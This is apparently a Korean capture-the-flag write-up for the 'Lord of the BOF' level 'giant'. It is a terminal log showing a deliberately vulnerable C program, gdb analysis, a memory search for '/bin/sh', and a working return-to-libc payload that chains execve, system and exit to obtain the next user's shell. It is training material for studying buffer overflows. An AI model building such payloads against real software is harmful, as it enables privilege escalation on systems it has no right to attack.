LOB 14번

login: giant
Password:
Login incorrect

login: bugbear
Password:
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cat giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}
[bugbear@localhost bugbear]$ ldd giant
        libc.so.6 => /lib/libc.so.6 (0x40018000)
        /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
[bugbear@localhost bugbear]$ nm /lib/libc.so.6 | grep execve
000f4860 ? __evoke_link_warning_fexecve
00091d48 t __execve
00091d48 W execve
00091da0 T fexecve
[bugbear@localhost bugbear]$ ls
giant  giant.c
[bugbear@localhost bugbear]$ cp gient giant
cp: gient: No such file or directory
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ rm jiant
[bugbear@localhost bugbear]$ cp giant jiant
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048560 <main>:       push   %ebp
0x8048561 <main+1>:     mov    %ebp,%esp
0x8048563 <main+3>:     sub    %esp,60
0x8048566 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804856a <main+10>:    jg     0x8048583 <main+35>
0x804856c <main+12>:    push   0x8048700
0x8048571 <main+17>:    call   0x8048444 <printf>
0x8048576 <main+22>:    add    %esp,4
0x8048579 <main+25>:    push   0
0x804857b <main+27>:    call   0x8048474 <exit>
0x8048580 <main+32>:    add    %esp,4
0x8048583 <main+35>:    push   0x804870c
0x8048588 <main+40>:    push   0x8048720
0x804858d <main+45>:    call   0x8048404 <popen>
0x8048592 <main+50>:    add    %esp,8
0x8048595 <main+53>:    mov    %eax,%eax
0x8048597 <main+55>:    mov    DWORD PTR [%ebp-44],%eax
0x804859a <main+58>:    mov    %eax,DWORD PTR [%ebp-44]
0x804859d <main+61>:    push   %eax
0x804859e <main+62>:    push   0xff
0x80485a3 <main+67>:    lea    %eax,[%ebp-40]
0x80485a6 <main+70>:    push   %eax
0x80485a7 <main+71>:    call   0x8048424 <fgets>
0x80485ac <main+76>:    add    %esp,12
0x80485af <main+79>:    lea    %eax,[%ebp-48]
0x80485b2 <main+82>:    push   %eax
0x80485b3 <main+83>:    push   0x804876b
0x80485b8 <main+88>:    lea    %eax,[%ebp-40]
0x80485bb <main+91>:    push   %eax
0x80485bc <main+92>:    call   0x8048484 <sscanf>
0x80485c1 <main+97>:    add    %esp,12
0x80485c4 <main+100>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485c7 <main+103>:   push   %eax
0x80485c8 <main+104>:   call   0x8048464 <fclose>
0x80485cd <main+109>:   add    %esp,4
0x80485d0 <main+112>:   push   0x804870c
0x80485d5 <main+117>:   push   0x8048780
0x80485da <main+122>:   call   0x8048404 <popen>
0x80485df <main+127>:   add    %esp,8
0x80485e2 <main+130>:   mov    %eax,%eax
0x80485e4 <main+132>:   mov    DWORD PTR [%ebp-44],%eax
0x80485e7 <main+135>:   mov    %eax,DWORD PTR [%ebp-44]
0x80485ea <main+138>:   push   %eax
0x80485eb <main+139>:   push   0xff
0x80485f0 <main+144>:   lea    %eax,[%ebp-40]
0x80485f3 <main+147>:   push   %eax
0x80485f4 <main+148>:   call   0x8048424 <fgets>
0x80485f9 <main+153>:   add    %esp,12
0x80485fc <main+156>:   lea    %eax,[%ebp-52]
0x80485ff <main+159>:   push   %eax
0x8048600 <main+160>:   push   0x80487c8
0x8048605 <main+165>:   lea    %eax,[%ebp-40]
0x8048608 <main+168>:   push   %eax
0x8048609 <main+169>:   call   0x8048484 <sscanf>
0x804860e <main+174>:   add    %esp,12
0x8048611 <main+177>:   mov    %eax,DWORD PTR [%ebp-44]
0x8048614 <main+180>:   push   %eax
0x8048615 <main+181>:   call   0x8048464 <fclose>
0x804861a <main+186>:   add    %esp,4
0x804861d <main+189>:   mov    %eax,DWORD PTR [%ebp-48]
---Type <return> to continue, or q <return> to quit---
0x8048620 <main+192>:   mov    %edx,DWORD PTR [%ebp-52]
0x8048623 <main+195>:   lea    %ecx,[%edx+%eax*1]
0x8048626 <main+198>:   mov    DWORD PTR [%ebp-56],%ecx
0x8048629 <main+201>:   push   4
0x804862b <main+203>:   mov    %eax,DWORD PTR [%ebp+12]
0x804862e <main+206>:   add    %eax,4
0x8048631 <main+209>:   mov    %edx,DWORD PTR [%eax]
0x8048633 <main+211>:   add    %edx,44
0x8048636 <main+214>:   push   %edx
0x8048637 <main+215>:   lea    %eax,[%ebp-60]
0x804863a <main+218>:   push   %eax
0x804863b <main+219>:   call   0x8048454 <memcpy>
0x8048640 <main+224>:   add    %esp,12
0x8048643 <main+227>:   mov    %eax,DWORD PTR [%ebp-60]
0x8048646 <main+230>:   cmp    %eax,DWORD PTR [%ebp-56]
0x8048649 <main+233>:   je     0x8048662 <main+258>
0x804864b <main+235>:   push   0x80487cb
0x8048650 <main+240>:   call   0x8048444 <printf>
0x8048655 <main+245>:   add    %esp,4
0x8048658 <main+248>:   push   0
0x804865a <main+250>:   call   0x8048474 <exit>
0x804865f <main+255>:   add    %esp,4
0x8048662 <main+258>:   mov    %eax,DWORD PTR [%ebp+12]
0x8048665 <main+261>:   add    %eax,4
0x8048668 <main+264>:   mov    %edx,DWORD PTR [%eax]
0x804866a <main+266>:   push   %edx
0x804866b <main+267>:   lea    %eax,[%ebp-40]
0x804866e <main+270>:   push   %eax
0x804866f <main+271>:   call   0x8048494 <strcpy>
0x8048674 <main+276>:   add    %esp,8
0x8048677 <main+279>:   lea    %eax,[%ebp-40]
0x804867a <main+282>:   push   %eax
0x804867b <main+283>:   push   0x80487e1
0x8048680 <main+288>:   call   0x8048444 <printf>
0x8048685 <main+293>:   add    %esp,8
0x8048688 <main+296>:   leave
0x8048689 <main+297>:   ret
0x804868a <main+298>:   nop
0x804868b <main+299>:   nop
0x804868c <main+300>:   nop
0x804868d <main+301>:   nop
0x804868e <main+302>:   nop
0x804868f <main+303>:   nop
End of assembler dump.
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"
ldd: /home/giant/assassin: No such file or directory
You must use execve!

Program exited normally.
(gdb) b*main+6
Breakpoint 1 at 0x8048566
(gdb) r "`python -c 'print "a"*48'`"
Starting program: /home/bugbear/jiant "`python -c 'print "a"*48'`"

Breakpoint 1, 0x8048566 in main ()
(gdb) x/100s 0xbfffffff-100
0xbfffff9b:      ";35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbfffffe8:      "/home/bugbear/jiant"
0xbffffffc:      ""
0xbffffffd:      ""
0xbffffffe:      ""
0xbfffffff:      ""
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
0xc0000000:      <Address 0xc0000000 out of bounds>
(gdb) x/12x 0xbfffff9b
0xbfffff9b:     0x3a35333b      0x69672e2a      0x31303d66      0x3a35333b
0xbfffffab:     0x6d622e2a      0x31303d70      0x3a35333b      0x62782e2a
0xbfffffbb:     0x31303d6d      0x3a35333b      0x70782e2a      0x31303d6d
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ clear
[bugbear@localhost bugbear]$ ls
giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl giant.c
     1  /*
     2          The Lord of the BOF : The Fellowship of the BOF
     3          - giant
     4          - RTL2
     5  */

     6  #include <stdio.h>
     7  #include <stdlib.h>
     8  #include <unistd.h>

     9  main(int argc, char *argv[])
    10  {
    11          char buffer[40];
    12          FILE *fp;
    13          char *lib_addr, *execve_offset, *execve_addr;
    14          char *ret;

    15          if(argc < 2){
    16                  printf("argv error\n");
    17                  exit(0);
    18          }

    19          // gain address of execve
    20          fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
    21          fgets(buffer, 255, fp);
    22          sscanf(buffer, "(%x)", &lib_addr);
    23          fclose(fp);

    24          fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
    25          fgets(buffer, 255, fp);
    26          sscanf(buffer, "%x", &execve_offset);
    27          fclose(fp);

    28          execve_addr = lib_addr + (int)execve_offset;
    29          // end

    30          memcpy(&ret, &(argv[1][44]), 4);
    31          if(ret != execve_addr)
    32          {
    33                  printf("You must use execve!\n");
    34                  exit(0);
    35          }

    36          strcpy(buffer, argv[1]);
    37          printf("%s\n", buffer);
    38  }
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[2]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ ls
getaddr  getaddr.c  giant  giant.c  jiant
[bugbear@localhost bugbear]$ nl getaddr.c
     1  #include <stdio.h>
     2  #include <string.h>
     3  int main(){
     4          long system = 0x00000000;
     5          while (memcmp((void*)system, "/bin/sh\x00", 8)){
     6                  system++;
     7          }
     8          printf("/bin/sh: %x\n", system);
     9          return 0;
    10  }
[bugbear@localhost bugbear]$ vi getaddr.c
[bugbear@localhost bugbear]$ rm getaddr
[bugbear@localhost bugbear]$ gcc -o getaddr getaddr.c
[bugbear@localhost bugbear]$ nl getaddr.c
     1  #include <stdio.h>
     2  #include <string.h>
     3  int main(){
     4          long system = 0x40058ae0;
     5          while (memcmp((void*)system, "/bin/sh\x00", 8)){
     6                  system++;
     7          }
     8          printf("/bin/sh: %x\n", system);
     9          return 0;
    10  }
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
[bugbear@localhost bugbear]$ bash2
[bugbear@localhost bugbear]$ gdb -q jiant
(gdb) b*main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/jiant

Breakpoint 1, 0x8048560 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x400391e0 <exit>
(gdb) p execve
$3 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb)
[1]+  Stopped                 gdb -q jiant
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@
sh: : command not found
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@▒@
bash$ my-pass
euid = 514
one step closer
bash$

 

 

쉘코드 없이 따는과정이 너무 흥미롭구만

파이썬 코드안에 ""은 \x0a 인식을 위해서임